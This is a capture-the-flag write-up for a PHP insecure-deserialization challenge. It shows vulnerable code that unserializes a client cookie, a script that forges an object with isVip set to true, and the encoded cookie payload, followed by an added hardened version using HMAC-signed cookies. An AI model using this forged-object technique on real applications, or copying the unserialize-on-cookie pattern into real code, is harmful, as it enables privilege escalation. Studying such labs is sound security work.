CTF-34 Solution Walkthrough

Track-子羽   ·   Posted 2021-11-22 17:33:11   ·   CTF & WP section

Source code analysis

    <h3>挑战VIP会员的第二天<h3/>
    <?php
    error_reporting(0);
    highlight_file(__FILE__);
    include('flag.php');

    class ctfShowUser
    {
        public $username='xxxxxx';
        public $password='xxxxxx';
        public $isVip=false;

        public function checkVip()
        {
            return $this->isVip;
        }

        public function login($u,$p)
        {
            return $this->username===$u&&$this->password===$p;
        }

        public function vipOneKeyGetFlag(){
            if($this->isVip)
            {
                global $flag;
                echo "your flag is ".$flag;
            }
            else
            {
                echo "no vip, no flag";
            }
        }
    }

    $username=$_GET['username'];
    $password=$_GET['password'];
    if(isset($username) && isset($password))
    {
        // Client-controlled cookie is deserialized directly into an object
        $user = unserialize($_COOKIE['user']);
        if($user->login($username,$password))
        {
            // isVip is read from the deserialized object, not from server-side state
            if($user->checkVip())
            {
                $user->vipOneKeyGetFlag();
            }
        }
        else
        {
            echo "no vip,no flag";
        }
    }

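The deserialization point is the user cookie: $_COOKIE['user'] is passed straight to unserialize(), so the client controls the properties of the resulting object. We need to make $isVip=true.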

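Generate the serialized object. Only isVip is serialized; username and password are left out, so after unserialize() they keep the class defaults ('xxxxxx'), which is what login() compares against: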

    <?php
    class ctfShowUser
    {
        public $isVip=true;
    }
    $a = serialize(new ctfShowUser());
    echo $a, "\n";        // raw serialized string
    echo urlencode($a);   // URL-encoded form
    ?>

Output:

    O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
    O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

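Payload:

    ?username=xxxxxx&password=xxxxxx

Set the cookie to:

    user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

The semicolons are encoded as %3b because a raw ; would end the cookie value; PHP URL-decodes cookie values before the script reads $_COOKIE.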
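
A hardened form of the cookie handling above, as an added example that is not part of the original write-up or the challenge: the cookie carries only an HMAC-signed identity and VIP status is looked up on the server, so nothing is passed to unserialize(). SECRET, issueCookie, readCookie and $vipUsers are hypothetical names, and the sample data is constructed.

```php
<?php
// Added example. SECRET, issueCookie, readCookie and $vipUsers are hypothetical names.
const SECRET = 'replace-with-a-random-server-side-key'; // placeholder, never sent to the client

// Privileges live on the server, keyed by username (constructed sample data).
$vipUsers = ['alice' => true, 'xxxxxx' => false];

// Cookie value = base64(JSON) . "." . HMAC-SHA256(base64(JSON)).
function issueCookie(string $username): string
{
    $body = base64_encode(json_encode(['u' => $username]));
    return $body . '.' . hash_hmac('sha256', $body, SECRET);
}

// Returns the username when the tag verifies, null for anything else.
function readCookie(string $cookie): ?string
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;                       // not in the format this server issues
    }
    [$body, $tag] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, SECRET), $tag)) {
        return null;                       // modified or forged value
    }
    $data = json_decode((string) base64_decode($body, true), true);
    return is_array($data) && is_string($data['u'] ?? null) ? $data['u'] : null;
}

// The serialized object from the write-up is just an unsigned string here.
$forged = 'O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}';
var_dump(readCookie($forged));

// A genuine cookie yields only an identity; VIP status comes from $vipUsers.
$cookie = issueCookie('xxxxxx');
$user = readCookie($cookie);
var_dump($user, $vipUsers[$user] ?? false);

// Changing one character of the signed body invalidates the tag.
$tampered = ($cookie[0] === 'A' ? 'B' : 'A') . substr($cookie, 1);
var_dump(readCookie($tampered));
```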
